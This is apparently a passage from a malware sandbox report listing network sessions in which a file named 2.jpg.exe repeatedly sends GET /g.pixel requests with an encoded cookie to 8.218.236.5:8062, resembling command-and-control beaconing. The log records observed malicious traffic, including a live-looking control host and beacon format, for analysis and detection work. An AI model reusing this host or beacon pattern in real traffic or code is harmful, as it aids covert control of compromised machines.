Apr 19, 2024 09:51:41.980277061 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:42.315613031 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	49867	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:42.748159885 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:43.070779085 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	49868	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:43.505851030 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:43.823240995 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	49869	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:44.259185076 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:44.577069044 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	49870	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:45.027491093 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:45.351557016 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	49871	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:45.774853945 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:46.094233990 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	49872	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:46.531208038 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:46.861222982 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	49873	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:47.308343887 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:47.633688927 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	49874	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:48.073712111 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:48.395981073 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	49875	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:48.819000006 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:49.133862972 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	49876	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:49.578393936 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:49.905004978 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	49877	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:50.344923973 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:50.673481941 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	49878	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:51.108690977 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:51.428894997 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	49879	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:51.865184069 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:52.198462963 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	49880	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:52.630413055 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:52.945664883 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.4	49881	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:53.388777971 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:53.713859081 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.4	49882	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:54.162518024 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:54.496021032 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.4	49883	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:54.927012920 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:55.243680954 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.4	49884	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:55.679469109 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:56.006063938 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	49885	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:56.436218977 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:56.763539076 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
150	192.168.2.4	49886	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:57.197369099 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:57.522103071 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
151	192.168.2.4	49887	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:57.944602013 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:58.258683920 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
152	192.168.2.4	49888	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:58.719432116 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:59.064054966 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
153	192.168.2.4	49889	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:51:59.496820927 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:51:59.820415974 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:51:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
154	192.168.2.4	49890	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:00.241965055 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:00.559451103 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
155	192.168.2.4	49891	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:00.994110107 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:01.315985918 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
156	192.168.2.4	49892	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:01.795308113 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:02.113545895 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
157	192.168.2.4	49893	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:02.540461063 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:02.864877939 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
158	192.168.2.4	49894	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:52:03.288181067 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:52:03.606941938 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:52:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
159	192.168.2.4	49895	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
